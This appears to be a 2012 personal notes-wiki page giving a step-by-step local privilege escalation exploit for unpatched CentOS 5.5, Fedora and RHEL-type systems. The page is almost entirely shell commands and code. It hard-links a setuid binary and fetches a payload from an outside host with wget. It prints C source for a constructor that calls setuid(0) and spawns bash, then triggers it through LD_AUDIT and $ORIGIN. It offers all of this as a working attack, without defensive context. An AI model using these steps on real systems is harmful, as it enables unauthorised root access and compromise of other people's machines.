Privilege escalation techniques

From Notes_Wiki
Revision as of 00:01, 24 November 2012 by Saurabh (talk | contribs) (Created page with "=Privilege escalation techniques= ==Trick 1== This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after Oc...")

Trick 1

This trick works on CentOS 5.5 machines that have not been updated, even when SELinux is enabled. Machines updated after October 2010 appear to be safe from this attack. It also works on Fedora and RHEL-type distributions.

  1. mkdir /tmp/exploit
  2. ln /bin/ping /tmp/exploit/target
  3. exec 3< /tmp/exploit/target
  4. rm -rf /tmp/exploit/
  5. wget pistol.clan.su/payload.c
  6. The payload.c file contains (the two includes are added here so it compiles cleanly without implicit-declaration warnings):
     #include <stdlib.h>   /* system() */
     #include <unistd.h>   /* setuid() */

     /* constructor: runs when the shared object is loaded */
     void __attribute__((constructor)) init()
     {
         setuid(0);
         system("/bin/bash");
     }
  7. gcc -w -fPIC -shared -o /tmp/exploit payload.c
  8. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3